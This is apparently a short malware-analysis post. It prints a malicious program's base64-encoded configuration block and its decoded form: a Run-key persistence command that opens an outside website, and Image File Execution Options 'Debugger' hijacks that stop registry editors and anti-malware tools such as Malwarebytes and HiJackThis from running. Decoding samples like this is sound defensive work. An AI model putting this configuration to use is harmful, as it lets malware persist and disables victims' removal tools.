1. <appSettings>
  2. <add key="Days" value="NQ=="/>
  3. <add key="RPath" value="U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu"/>
  4. <add key="RPath2" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xyZWdlZGl0LmV4ZQ=="/>
  5. <add key="RPath3" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xhdnouZXhl"/>
  6. <add key="RPath4" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xDQ2xlYW5lci5leGU="/>
  7. <add key="RPath5" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xDQ2xlYW5lcjY0LmV4ZQ=="/>
  8. <add key="RPath6" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSZWdXb3Jrcy5leGU="/>
  9. <add key="RPath7" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xBdXRvTG9nZ2VyLmV4ZQ=="/>
  10. <add key="RPath8" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xIaUphY2tUaGlzLmV4ZQ=="/>
  11. <add key="RPath9" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xBblZpci5leGU="/>
  12. <add key="RPath10" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xGUlNULmV4ZQ=="/>
  13. <add key="RPath11" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xGUlNUNjQuZXhl"/>
  14. <add key="RPath12" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSU0lULmV4ZQ=="/>
  15. <add key="RPath13" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSU0lUeDY0LmV4ZQ=="/>
  16. <add key="RPath14" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xhZHdjbGVhbmVyXzUuMDA1LmV4ZQ=="/>
  17. <add key="RPath15" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xtYmFtLmV4ZQ=="/>
  18. <add key="RName" value="Q01E"/>
  19. <add key="RValue" value="Y21kLmV4ZSAvYyBzdGFydCBodHRwOi8vZ2FuZ25hbWdhbWUub3JnICYmIGV4aXQ="/>
  20. <add key="RNameX" value="RGVidWdnZXI="/>
  21. <add key="RValueX" value="c3ZjaG9zdC5leGU="/>
  22. </appSettings>
  23. After decoding
  24. <appSettings>
  25. <add key="Days" value="5"/>
  26. <add key="RPath" value="Software\Microsoft\Windows\CurrentVersion\Run"/>
  27. <add key="RPath2" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe"/>
  28. <add key="RPath3" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avz.exe"/>
  29. <add key="RPath4" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe"/>
  30. <add key="RPath5" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe"/>
  31. <add key="RPath6" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegWorks.exe"/>
  32. <add key="RPath7" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutoLogger.exe"/>
  33. <add key="RPath8" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HiJackThis.exe"/>
  34. <add key="RPath9" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AnVir.exe"/>
  35. <add key="RPath10" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRST.exe"/>
  36. <add key="RPath11" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRST64.exe"/>
  37. <add key="RPath12" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSIT.exe"/>
  38. <add key="RPath13" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSITx64.exe"/>
  39. <add key="RPath14" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe"/>
  40. <add key="RPath15" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe"/>
  41. <add key="RName" value="CMD"/>
  42. <add key="RValue" value="cmd.exe /c start http://gangnamgame.org && exit"/>
  43. <add key="RNameX" value="Debugger"/>
  44. <add key="RValueX" value="svchost.exe"/>
  45. </appSettings>
Comments powered by Disqus